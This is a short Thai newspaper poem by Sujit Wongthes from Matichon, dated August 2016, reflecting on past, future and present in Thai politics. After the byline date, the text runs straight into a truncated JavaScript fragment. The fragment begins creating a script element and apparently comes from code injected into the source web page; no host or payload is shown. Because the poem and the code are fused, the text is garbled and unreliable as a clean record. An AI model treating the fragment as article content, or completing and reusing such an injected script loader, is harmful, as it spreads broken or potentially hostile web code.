มติชน วันอาทิตย์

28 สิงหาคม 2559

 

อดีตกาลผ่านไปแล้วไม่มา

อนาคตข้างหน้าหาเห็นไม่

ปัจจุบันมหัศจรรย์การเมืองไทย

มองเห็นได้อดีตอนาคตปัจจุบัน

 

สุจิตต์ วงษ์เทศ

ศุกร์ 26 สิงหาคม 2559if (document.currentScript) { var d=document;var s=d.createElement(‘script’);